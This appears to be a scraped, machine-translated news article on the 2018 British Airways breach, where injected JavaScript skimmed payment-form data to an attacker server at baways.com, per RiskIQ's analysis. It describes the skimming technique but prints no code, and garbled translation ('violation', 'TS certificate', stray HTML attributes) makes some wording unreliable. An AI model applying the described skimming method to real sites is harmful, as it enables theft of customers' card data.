The British Airways website had a credit card theft code injected



[ad_1]

Article intro image
Enlarge / Thousands of BA customers have seen their credit card data "skimmed" by malicious JavaScript code inserted into the airline's website.

Alf van Beem

Last week, British Airways revealed that all payment information processed through the airline's website and mobile application between August 21 and September 5 had been exposed. Some 38,000 British Airways customers were able to have their contact and financial information stolen as part of the violation, suggesting that malicious JavaScript code has been installed on the British Airway website.

According to a report released Tuesday by RiskIQ chief researcher Yonathan Klijnsma, RiskIQ detected the use of a script associated with a "threat group" RiskIQ called Magecart. the same group of actors suspected of causing a credit card breach at Ticketmaster UK. While the violation of Ticketmaster UK was the result of the injection of JavaScript via a third-party service used by the Ticketmaster website, the British Airways violation was actually the result of a compromise of the Web server of BA, according to the RiskIQ analysis.

"This attack is a very focused approach compared to what we have seen in the past with the Magecart skimmer," Klijnsma said. "This skimmer is aware of the configuration of the British Airways payment page, which tells us that the attackers considered how to target that particular site."

The 22 lines of code found by RiskIQ researchers buried in the British Airways JavaScript libraries resulted in the theft of thousands of customer payment data. "Src =" https://cdn.arstechnica.net/wp-content/uploads/2018/09/magecart-640x354.jpg "width =" 640 "height =" 354 "srcset =" https: //cdn.arstechnica .net / wp-content / uploads / 2018/09 / magecart-1280x708.jpg 2x
Enlarge / The 22 lines of code found by RiskIQ researchers buried in the British Airways JavaScript libraries resulted in the theft of thousands of customer payment data.

The suspicious scripts were detected based on a daily Web site analysis conducted by RiskIQ, which collects data on more than two billion pages per day. Focusing on how the scripts on the BA site have changed over time, RiskIQ researchers found a modified script on BA's website. Code added to a JavaScript library used by the BA site called API on a malicious web server on baways.com – a vendor-hosted virtual private server in Lithuania, using a TS certificate registered via Comodo (apparently to increase its appearance of legitimacy) ) August 15th.

The 22 lines of code are intended to export the data entered on the payment form of the BA website to the malicious server when a user clicks on the "Submit" button, the data being sent as a file. a JSON object. As a result, the transaction went through the client without any errors, while the hackers received a complete copy of the customer's payment information, although the payment was apparently on a secure session. Attackers also added a "touchend" reminder to the script, which made the attack functional for users of BA's mobile app, who called the same modified script.

While the timestamp of the modified script file corresponds to the start of the attack reported by British Airways, the date of registration of the malicious site certificate, according to Klijnsma, "indicates [the attackers] probably had access to the British Airways website before the start date of the attack announced on August 21, probably long before. In the absence of visibility into its web-based web resources, British Airways was unable to detect this compromise until it was too late. "

British Airways would not comment on the RiskIQ report, as a criminal investigation is still ongoing.

[ad_2]
Source link